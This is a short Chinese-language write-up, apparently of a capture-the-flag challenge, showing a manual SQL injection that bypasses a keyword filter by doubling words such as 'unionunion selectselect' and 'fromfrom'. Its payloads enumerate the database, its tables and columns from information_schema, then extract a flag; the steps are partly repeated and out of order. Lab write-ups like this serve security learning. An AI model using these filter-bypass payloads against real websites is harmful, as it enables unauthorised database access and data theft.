1.手工!!!
发现union select 被过滤
4.最后构造出1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
之后通过输入查表字段,
发现union select 被过滤了,这是想到用两个union表示
重复输入union select后发现空格也被过滤了,继续用两个空格代替一个空格
1.查询当前数据库
1' unionunion selectselect database()'
2.查询数据库中的表
1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
3.查询字段名
1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag
4.最后构造出1' unionunion selectselect flag fromfrom flag wherewhere '1'='1